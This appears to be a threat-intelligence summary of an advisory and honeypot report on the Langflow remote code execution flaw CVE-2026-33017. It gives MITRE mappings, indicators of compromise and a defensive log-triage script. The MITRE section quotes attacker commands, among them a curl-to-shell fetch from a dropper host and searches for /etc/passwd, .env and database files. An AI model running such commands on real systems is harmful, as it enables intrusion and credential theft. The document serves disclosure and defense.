CVE-2026-33017: How attackers compromised Langflow AI pipelines in 20 hours

CVE-2026-33017 is an unauthenticated remote code execution flaw in Langflow’s public flow build endpoint that attackers weaponized within ~20 hours of disclosure to execute arbitrary Python and exfiltrate credentials. Sysdig’s honeypots recorded rapid, multi-stage exploitation (nuclei-based scanning, custom Python exploit scripts, and staged dropper/C2 infrastructure) that harvested environment variables, .env files, and database artifacts.

Keypoints

  • The vulnerability (CVE-2026-33017) is an unauthenticated RCE in Langflow’s POST /api/v1/build_public_tmp/{flow_id}/flow endpoint that executes attacker-supplied Python in node definitions without sandboxing.
  • Working exploits were observed ~20 hours after the advisory, despite no public PoC, demonstrating attackers built exploits directly from the advisory text.
  • Sysdig’s honeypots recorded three exploitation phases: rapid nuclei-based automated scans, custom Python exploit reconnaissance and stage-2 delivery, then targeted credential harvesting and data exfiltration.
  • Attackers exfiltrated environment variables, .env files, and database files, and used pre-staged infrastructure (dropper at 173.212.205.251:8443 and C2 at 143.110.183.86:8080) for payload delivery and data collection.
  • Indicators point to both privately authored nuclei templates for mass scanning and custom exploit scripts that progressed from validation to active compromise in a single session.
  • Runtime detection (system-call and behavior-based rules) is essential for day-zero defense because the patch window from disclosure to weaponization is now often measured in hours.
  • Practical mitigations include updating Langflow or restricting/disabling the public flow build endpoint, rotating exposed credentials, applying network segmentation/firewalls, and monitoring for outbound callbacks to known DNS/interaction services.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – The vulnerability is an unauthenticated RCE in a public endpoint allowing remote code execution (‘CVE-2026-33017 is an unauthenticated remote code execution (RCE) in the public flow build endpoint’).
  • [T1059.006] Command and Scripting Interpreter: Python – Attackers executed Python on the server (including os.popen usage) to run shell commands (‘_r = __import__('os').popen('id').read()’).
  • [T1105] Ingress Tool Transfer – Stage-2 payloads were retrieved from attacker infrastructure using curl and piped to sh (‘bash -c "$(curl -fsSL http://173.212.205.251:8443/z)"’).
  • [T1083] File and Directory Discovery – Attackers enumerated directories and files to locate secrets and databases (‘ls -al /root; ls /app; cat /etc/passwd’ and ‘find /app -name "*.db" -o -name "*.env"’).
  • [T1082] System Information Discovery – Adversaries fingerprinted the environment to identify user and system context (‘id (returned uid=1000(langflow))’).
  • [T1552.001] Credentials in Files – Attackers harvested credentials from application files and environment files (‘.env files containing application secrets’ and ‘Environment variable dump: Executed env to capture the full process environment’).
  • [T1041] Exfiltration Over C2 Channel – Collected data was encoded and sent to attacker-controlled callback/C2 servers (‘exfiltrates it to an interactsh callback server’ and ‘Receives base64-encoded exfiltration’).
  • [T1071.001] Application Layer Protocol: Web Protocols – Exfiltration and C2 used HTTP-based callbacks and web protocols for communication (outbound connections to ‘143.110.183.86:8080’ and HTTP POST payloads to the vulnerable endpoint).
  • [T1071.004] Application Layer Protocol: DNS – Scanning/exfiltration leveraged DNS/interaction domains (DNS lookups and callbacks to .oast.* interactsh subdomains and references to ‘oastify.com’ in detection rules: ‘DNS Lookup for Offensive Security Tool Domain Detected’).

Indicators of Compromise

  • [IP Address] source scanning and exploitation – 77.110.106.154 (nuclei scan), 83.98.164.238 (custom exploit/recon)
  • [IP:Port] C2 and dropper infrastructure – 143.110.183.86:8080 (C2 receiving base64 exfiltration), 173.212.205.251:8443 (dropper host serving /z)
  • [Domain / Subdomain] interactsh/OAST callback domains used for exfiltration – d6tcpc6flblph01gdcb0ku9ixih393m54.oast.live, d6tcpe7nsv6kk9rdrpggi37zmjfxw9imr.oast.me, and other ephemeral subdomains (~9 more observed)
  • [URL] dropper and callback URLs – http://173.212.205.251:8443/z (stage-2 dropper), http://143.110.183.86:8080/ (C2 endpoint)
  • [File paths / filenames] targeted sensitive files and search patterns – .env, /etc/passwd, and find queries for ‘*.db’ files
  • [HTTP Header / Cookie] scanner identification and flow naming – Cookie: client_id=nuclei-scanner and flow name ‘nuclei-cve-2026-33017’ observed in exploit requests
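
A log-triage sketch built from the indicators above, added here as an example (it is not Sysdig's or Langflow's code). The whitespace-separated proxy log format, the function names, and the sample lines are assumptions made for the example; the endpoint path, cookie, IPs, and callback domains come from this page.

```python
import re

# Indicators copied from this page's IoC list.
BUILD_PATH = re.compile(r"^/api/v1/build_public_tmp/[^/?]+/flow/?(\?.*)?$")
SCANNER_COOKIE = "client_id=nuclei-scanner"
KNOWN_SOURCES = {"77.110.106.154", "83.98.164.238"}
KNOWN_INFRA = {"143.110.183.86:8080", "173.212.205.251:8443"}
# Subdomains of oast.* (interactsh) and oastify.com; "toast.live" must not match.
OAST_DOMAIN = re.compile(r"(\.oast\.[a-z]+|(^|\.)oastify\.com)\.?$", re.I)

def triage_http(lines):
    """Return (src, path, reasons) for each POST to the public build endpoint."""
    # Assumed line format (constructed): src method path status cookie-or-dash
    hits = []
    for line in lines:
        try:
            src, method, path, _status, cookie = line.split(None, 4)
        except ValueError:
            continue  # malformed line: skip rather than abort the triage
        if method != "POST" or not BUILD_PATH.match(path):
            continue
        reasons = ["public-build-post"]  # a lead on its own, not a verdict
        if SCANNER_COOKIE in cookie:
            reasons.append("nuclei-cookie")
        if src in KNOWN_SOURCES:
            reasons.append("known-source-ip")
        hits.append((src, path, reasons))
    return hits

def triage_egress(dns_names, connections):
    """Flag OAST lookups and connections to the listed dropper/C2 hosts."""
    found = [("oast-dns", n) for n in dns_names if OAST_DOMAIN.search(n)]
    found += [("known-infra", c) for c in connections if c in KNOWN_INFRA]
    return found

# Constructed sample data (not real traffic); the flow id is a placeholder.
FLOW = "/api/v1/build_public_tmp/00000000-0000-0000-0000-000000000000/flow"
SAMPLE_HTTP = [
    f"77.110.106.154 POST {FLOW} 200 client_id=nuclei-scanner",
    f"198.51.100.4 POST {FLOW} 200 -",
    f"203.0.113.9 GET {FLOW} 405 -",
    "198.51.100.4 POST /health 200 -",
    "truncated line",
]
SAMPLE_DNS = ["example.oast.live", "pypi.org", "abc.oastify.com", "toast.live"]
SAMPLE_CONN = ["143.110.183.86:8080", "10.0.0.5:5432"]
```

A POST to the build endpoint followed by an OAST lookup or a connection to the listed infrastructure from the same host is the pairing worth escalating first.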


Read more: https://www.sysdig.com/blog/cve-2026-33017-how-attackers-compromised-langflow-ai-pipelines-in-20-hours